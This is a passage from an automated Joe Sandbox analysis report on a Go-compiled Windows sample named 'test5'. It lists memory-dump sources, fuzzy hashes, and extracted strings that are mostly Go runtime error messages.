                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: , goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendl$, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp$invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobje$runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup298023223876953125operation canceledno child processesRFS specific erroridentifi$suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function traceRegion: alloc with concurrent drop277555756156289135105907917022705078125transport endpoint is alre
                      • API String ID: 0-788059655
                      • Opcode ID: 16a5b275843de8584f6ef7191081293e53e46c9d5c06cc83c17e72ae31cb8be0
                      • Instruction ID: e84001188445d2d86c7f29cafb25c83e691ac13d435dfe3c6c1a3712ec159da3
                      • Opcode Fuzzy Hash: 16a5b275843de8584f6ef7191081293e53e46c9d5c06cc83c17e72ae31cb8be0
                      • Instruction Fuzzy Hash: EDD173B620CB8086DB50DB55F4417AABB66F789BD0F449166EF9D43B66CF38C481CB10
                      Strings
                      • base of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsName, xrefs: 0069D85B
                      • runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket, xrefs: 0069D7E7
                      • marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during , xrefs: 0069D89E
                      • objgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::, xrefs: 0069D876
                      • greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCom, xrefs: 0069D8AF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: base of ) = <==GOGC] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsName$greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCom$marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during $objgc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::$runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket
                      • API String ID: 0-260558280
                      • Opcode ID: e7ba2c6f92e79187f52a96f01db108cfb22b97d84b5c04d37ef361dc417cbedd
                      • Instruction ID: 3bccb4efd37948d65edf53db445e3bf6328c4faf280fffad30e15f5c5ee6ba31
                      • Opcode Fuzzy Hash: e7ba2c6f92e79187f52a96f01db108cfb22b97d84b5c04d37ef361dc417cbedd
                      • Instruction Fuzzy Hash: 9061BEB2618B8086DF509F11E8413A9BB6AF785B90F84513AEF8D07BA6CF3CC595C740
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2-by$expa$nd 3$te k
                      • API String ID: 0-3581043453
                      • Opcode ID: d0a0678b136faf6cdae2b5bb443573c909990b14ac4f0b67f8b4f134291ae36c
                      • Instruction ID: 4e8fa0b6b0a7216c9fca8576cbf9a12e3c0c72d5d03413782a84bff1b4e31085
                      • Opcode Fuzzy Hash: d0a0678b136faf6cdae2b5bb443573c909990b14ac4f0b67f8b4f134291ae36c
                      • Instruction Fuzzy Hash: DEB1B066F29FD94AF323A63810036B7EB185FFB9C9A40E327FC9474A87D72095036254
                      Strings
                      • stopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executioncompileCallback: float arguments not supportedruntime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base poin, xrefs: 006BB9A4
                      • stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset called on uninitialized Timernet/url: inval, xrefs: 006BB8EA
                      • stopTheWorld: holding locksgcstopm: not waiting for gcruntime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a , xrefs: 006BBA05
                      • stopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 2138777878078144567552953958511352539062569388939039072283776, xrefs: 006BB9BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: stopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 2138777878078144567552953958511352539062569388939039072283776$stopTheWorld: holding locksgcstopm: not waiting for gcruntime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a $stopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executioncompileCallback: float arguments not supportedruntime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base poin$stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset called on uninitialized Timernet/url: inval
                      • API String ID: 0-1975636751
                      • Opcode ID: c9a1f14e63505ac3ebfedc1963bd5287c1badf82fc21faf96302d93c0e621c45
                      • Instruction ID: 38f6fe4c81b6c9c10207dbb56f2b1e7c9f29aa4e8cdfb6ab4e79eefaea763a62
                      • Opcode Fuzzy Hash: c9a1f14e63505ac3ebfedc1963bd5287c1badf82fc21faf96302d93c0e621c45
                      • Instruction Fuzzy Hash: 33C1D772209B84C5DB51DF26E8513AEB766F385B90F08912AEE8D43766DF7DC485CB00
                      Strings
                      • reflect., xrefs: 006B78CC
                      • runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno da, xrefs: 006B78A5
                      • bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431, xrefs: 006B7993
                      • runtime., xrefs: 006B7872
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431$reflect.$runtime.$runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno da
                      • API String ID: 0-4191565186
                      • Opcode ID: 9e8be957bda312eb65024304ae33ef9032152905b9f2351b06796b657fe3e796
                      • Instruction ID: f8151b8c97dcaf77e3ea09cf20578a938c72deb261c638dcce86c5995490fef2
                      • Opcode Fuzzy Hash: 9e8be957bda312eb65024304ae33ef9032152905b9f2351b06796b657fe3e796
                      • Instruction Fuzzy Hash: E971BFB2B18A4086DB24DF25A0803EAB763F7C5B94F584239DB8E57B55DB38D8C2C704
                      Strings
                      • runtime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not , xrefs: 006B0BCF
                      • runtime: netpoll failedpanic during preemptoffnanotime returning zerofatal: morestack on g0the current g is not g0schedule: holding locksprocresize: invalid argspan has no free stacksstack growth after forkshrinkstack at bad timereflect.methodValueCall2328306, xrefs: 006B0B4F, 006B0BAF, 006B0BF9
                      • runtime: SetWaitableTimer failed; errno= stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset ca, xrefs: 006B0B89
                      • runtime: NtAssociateWaitCompletionPacket failed; errno= non-empty pointer map passed for non-pointer-size valuesruntime: checkmarks found unexpected unmarked object obj=sync: WaitGroup misuse: Add called concurrently with Waittried to trace goroutine with inva, xrefs: 006B0B26
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: runtime: NtAssociateWaitCompletionPacket failed; errno= non-empty pointer map passed for non-pointer-size valuesruntime: checkmarks found unexpected unmarked object obj=sync: WaitGroup misuse: Add called concurrently with Waittried to trace goroutine with inva$runtime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not $runtime: SetWaitableTimer failed; errno= stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset ca$runtime: netpoll failedpanic during preemptoffnanotime returning zerofatal: morestack on g0the current g is not g0schedule: holding locksprocresize: invalid argspan has no free stacksstack growth after forkshrinkstack at bad timereflect.methodValueCall2328306
                      • API String ID: 0-3833993146
                      • Opcode ID: 0353096b0f3d277faceec8951c9e06cec168420f81100d86bce71ba3d6d2d286
                      • Instruction ID: 1cce11ecfcd4a38139d7e8ba3aade72e6bc9622d756c1140881e4f684aeee237
                      • Opcode Fuzzy Hash: 0353096b0f3d277faceec8951c9e06cec168420f81100d86bce71ba3d6d2d286
                      • Instruction Fuzzy Hash: A4517272218B84C5D640DF65F48139ABB65F789BD0F449229EA9C43BA6DF38C481CB54
                      Strings
                      • packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinva, xrefs: 0068BB25
                      • -> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac, xrefs: 0068BB45
                      • cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/, xrefs: 0068BB05
                      • runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p, xrefs: 0068BAE5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: -> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac$ cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/$ packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinva$runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p
                      • API String ID: 0-3765948214
                      • Opcode ID: ceeb432f02caf0a330ac173be02f98750f9486feb9931f3ca144a3ccaea6bc39
                      • Instruction ID: d04558f90fecc399a04fd54cb30eaa06d51e4f23c34cc6a46cdf26bfca233ad9
                      • Opcode Fuzzy Hash: ceeb432f02caf0a330ac173be02f98750f9486feb9931f3ca144a3ccaea6bc39
                      • Instruction Fuzzy Hash: 09218F72618B45CADA40AF11F8813A9A7A9F789B80F489535EE9D47729CF3CC441C754
                      Strings
                      • runtime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significa, xrefs: 006B38C7
                      • self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal seekshort bu, xrefs: 006B3905
                      • runtime.preemptM: duplicatehandle failedstopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755, xrefs: 006B38EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significa$runtime.preemptM: duplicatehandle failedstopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755$self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal seekshort bu
                      • API String ID: 0-257803030
                      • Opcode ID: 5da88f6799b1e11f1e6c44d99768cbec3cc73a39ff338e495a799644e6f1c903
                      • Instruction ID: 7308624ef82655a048e7e2492ad0abb52618a581ded113e5976c92ce06330c15
                      • Opcode Fuzzy Hash: 5da88f6799b1e11f1e6c44d99768cbec3cc73a39ff338e495a799644e6f1c903
                      • Instruction Fuzzy Hash: BEC19E76605F8081CB60DF25E8413AEB761F74AB94F159236DAAC837A5DF39C5C2CB04
                      Strings
                      • MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=3814697265625level 3 reset, xrefs: 0069E265
                      • pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memory, xrefs: 0069E1E6
                      • (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fn, xrefs: 0069E205
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
